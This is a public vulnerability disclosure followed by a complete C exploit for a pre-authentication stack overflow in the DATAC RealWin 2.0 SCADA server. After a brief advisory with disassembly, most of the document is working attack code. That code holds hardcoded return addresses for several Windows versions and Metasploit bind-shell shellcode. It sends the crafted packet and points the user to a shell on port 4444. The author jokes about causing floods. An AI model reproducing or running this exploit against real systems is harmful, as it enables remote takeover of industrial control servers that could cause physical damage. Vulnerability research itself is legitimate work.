Hi --------------------------------- http://www.dataconline.com/software/realwin.php "RealWin is a SCADA server product which includes a FlexView HMI and runs on current Microsoft Windows platforms (2000 and XP). It can operate on a single PC or multiple PCs connected through a TCP/IP network. It reads and maintains data returned from field devices using drivers, stores data for historical access, runs Command Sequence Language (CSL) scripts and generates alarms as defined in the system." --------------------------------- The version available for download (http://www.realflex.com/download/form.php) is likely an old one so newer versions may, or may not, be vulnerable. Note that the server is affected by other flaws, but this one is pretty clear and 100% reliable. The bug is a classic stack overflow while processing a specially crafted FC_INFOTAG/SET_CONTROL packet. RealWin server accepts connections from FlewWin clients which use a propietary protocol. We can exploit this flaw from remote without having valid credentials . ----------- .text:0042BFFE call sub_419690 ; Get Packet.PayloadLen .text:0042C003 movzx ecx, ax .text:0042C006 mov edx, ecx .text:0042C008 shr ecx, 2 .text:0042C00B mov esi, ebx .text:0042C00D lea edi, [esp+638h+var_2E0] .text:0042C014 rep movsd .text:0042C016 mov ecx, edx .text:0042C018 and ecx, 3 .text:0042C01B rep movsb ----------- That's all, just for fun. Regards, Rubn. //////////////////////////////////////////////////////////////////// //// DATAC RealWin 2.0 SCADA Software - Remote PreAuth Exploit -. //// -------------------------------------------------------- //// This code can only be used for personal study //// and/or research purposes on even days. //// //// The author is not responsible for any illegal usage. //// So if you flood your neighborhood that's your f******* problem =) //// --------------- //// Note //// --------------- //// ## The exploit has been tested against a build that seems pretty old. //// ## Therefore this flaw may be not reproducible on newer versions. //// //// http://www.dataconline.com //// http://www.realflex.com/download/form.php //// //// Ruben Santamarta www.reversemode.com //// #include <winsock2.h> #include <windows.h> #include <stdio.h> #pragma comment(lib,"wsock32.lib") #define REALWIN_PORT 910 #define PACKET_HEADER_MAGIC 0x67542310 #define EXPLOIT_LEN 0x810 #define PING_LEN 0x200 #define FUNC_INFOTAG_SET_CONTROL 0x5000A #define FUNC_PING 0x70001 typedef struct { const char *szTarget; ULONG_PTR retAddr; } TARGET; TARGET targets[] = { { "Windows 2000 SP4 [ES]", 0x779D4F6A}, // call esp - oleaut32.dll { "Windows 2000 SP4 [EN]", 0x77E3C256 }, // jmp esp - user32.dll { "Windows XP SP2 [EN]", 0x7C914393 }, // call esp - ntdll.dll { "Windows XP SP2 [ES]", 0x7711139B}, // call esp - oleaut32.dll { NULL,0xFFFFFFFF} }; int main(int argc, char* argv[]) { WSADATA ws; SOCKET tcp_socket, tcp_ping; char bBuffer[0x10] = {0}; struct sockaddr_in peer; char *pExploitPacket = NULL; char *pPingPacket = NULL; ULONG_PTR uFixed; /* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5" "\xd8\xfb\x1b\x83\xeb\xfc\xe2\xf4\x59\xb2\x10\x56\x4d\x21\x04\xe4" "\x5a\xb8\x70\x77\x81\xfc\x70\x5e\x99\x53\x87\x1e\xdd\xd9\x14\x90" "\xea\xc0\x70\x44\x85\xd9\x10\x52\x2e\xec\x70\x1a\x4b\xe9\x3b\x82" "\x09\x5c\x3b\x6f\xa2\x19\x31\x16\xa4\x1a\x10\xef\x9e\x8c\xdf\x33" "\xd0\x3d\x70\x44\x81\xd9\x10\x7d\x2e\xd4\xb0\x90\xfa\xc4\xfa\xf0" "\xa6\xf4\x70\x92\xc9\xfc\xe7\x7a\x66\xe9\x20\x7f\x2e\x9b\xcb\x90" "\xe5\xd4\x70\x6b\xb9\x75\x70\x5b\xad\x86\x93\x95\xeb\xd6\x17\x4b" "\x5a\x0e\x9d\x48\xc3\xb0\xc8\x29\xcd\xaf\x88\x29\xfa\x8c\x04\xcb" "\xcd\x13\x16\xe7\x9e\x88\x04\xcd\xfa\x51\x1e\x7d\x24\x35\xf3\x19" "\xf0\xb2\xf9\xe4\x75\xb0\x22\x12\x50\x75\xac\xe4\x73\x8b\xa8\x48" "\xf6\x8b\xb8\x48\xe6\x8b\x04\xcb\xc3\xb0\xea\x47\xc3\x8b\x72\xfa" "\x30\xb0\x5f\x01\xd5\x1f\xac\xe4\x73\xb2\xeb\x4a\xf0\x27\x2b\x73" "\x01\x75\xd5\xf2\xf2\x27\x2d\x48\xf0\x27\x2b\x73\x40\x91\x7d\x52" "\xf2\x27\x2d\x4b\xf1\x8c\xae\xe4\x75\x4b\x93\xfc\xdc\x1e\x82\x4c" "\x5a\x0e\xae\xe4\x75\xbe\x91\x7f\xc3\xb0\x98\x76\x2c\x3d\x91\x4b" "\xfc\xf1\x37\x92\x42\xb2\xbf\x92\x47\xe9\x3b\xe8\x0f\x26\xb9\x36" "\x5b\x9a\xd7\x88\x28\xa2\xc3\xb0\x0e\x73\x93\x69\x5b\x6b\xed\xe4" "\xd0\x9c\x04\xcd\xfe\x8f\xa9\x4a\xf4\x89\x91\x1a\xf4\x89\xae\x4a" "\x5a\x08\x93\xb6\x7c\xdd\x35\x48\x5a\x0e\x91\xe4\x5a\xef\x04\xcb" "\x2e\x8f\x07\x98\x61\xbc\x04\xcd\xf7\x27\x2b\x73\x4a\x16\x1b\x7b" "\xf6\x27\x2d\xe4\x75\xd8\xfb\x1b"; int i,c; system("cls"); printf("\n\t\t- DATAC RealWin 2.0 SCADA Software -\n"); printf("\tProtocol Command INFOTAG/SET_CONTROL Stack Overflow\n"); printf("\nRuben Santamarta - reversemode.com \n\n"); if( argc < 3 ) { printf("\nusage: exploit.exe ip TargetNumber"); printf("\n\nexample: exploit 1\n\n"); for( i = 0; targets[i].szTarget; i++ ) { printf("\n[ %d ] - %s", i, targets[i].szTarget); } printf("\n"); exit(0); } WSAStartup(0x0202,&ws); peer.sin_family = AF_INET; peer.sin_port = htons( REALWIN_PORT ); peer.sin_addr.s_addr = inet_addr( argv[1] ); tcp_socket = socket(AF_INET, SOCK_STREAM, 0); if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)) ) { printf("\n[!!] Host unreachable :( \n\n"); exit(0); } pExploitPacket = (char*) calloc( EXPLOIT_LEN, sizeof(char) ); pPingPacket = (char*) calloc( PING_LEN, sizeof(char) ); memset( (void*)pExploitPacket, 0x90, EXPLOIT_LEN); memset( (void*)pPingPacket, 0x90, PING_LEN); uFixed = targets[atoi(argv[2])].retAddr; for( i=0x0; i< 0xbe; i++) { *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + i*sizeof(ULONG_PTR) +2 ) ) = uFixed; } // Bypass silly things. *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + 0xbe*sizeof(ULONG_PTR) +2 ) ) = 0x404040; // MAGIC_HEADER *( ( ULONG_PTR* ) pExploitPacket ) = PACKET_HEADER_MAGIC; //Payload Length *( ( ULONG_PTR* ) pExploitPacket + 1 ) = 0x800; //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL) *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 10 ) ) = FUNC_INFOTAG_SET_CONTROL; //First Parameter *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 14 ) ) = 0x4; // Internal Switch //Mark *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 44 ) ) = 0xDEADBEEF; // Our marker memcpy( (void*)((char*)pExploitPacket + EXPLOIT_LEN - sizeof(scode)) ,scode ,sizeof(scode)-1); send(tcp_socket, pExploitPacket, EXPLOIT_LEN, 0 ); printf("[+] Exploit packet sent...now checking host availability\n"); // MAGIC_HEADER *( ( ULONG_PTR* ) pPingPacket ) = PACKET_HEADER_MAGIC; //Payload Length *( ( ULONG_PTR* ) pPingPacket + 1 ) = 0x20; //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL) *( (ULONG_PTR*)(( BYTE*) pPingPacket + 10 ) ) = FUNC_PING; //First Parameter *( (ULONG_PTR*)(( BYTE*) pPingPacket + 14 ) ) = 0x1; // whatever //Mark *( (ULONG_PTR*)(( BYTE*) pPingPacket + 44 ) ) = 0xDEADBEEF; //Our marker tcp_ping = socket(AF_INET, SOCK_STREAM, 0); if ( connect(tcp_ping, (struct sockaddr*) &peer, sizeof(sockaddr_in)) ) { printf("\n[!!] Host died, long live to the Host! \n\n"); exit(0); } i = recv(tcp_ping, bBuffer, 0x8, 0 ); if( i ) { printf("[+] The host is up and running\n\t:: %d bytes received: ",i); for( c = 0; c<i; c++) printf("%02X ", (unsigned char)bBuffer[c]); printf("\n"); }else { printf("\n[!!] Host died, long live to the Host! \n\n"); } closesocket(tcp_ping); closesocket(tcp_socket); Sleep(1000); printf("\n[+] Try: telnet %s 4444\n\n",argv[1]); WSACleanup(); return 0; }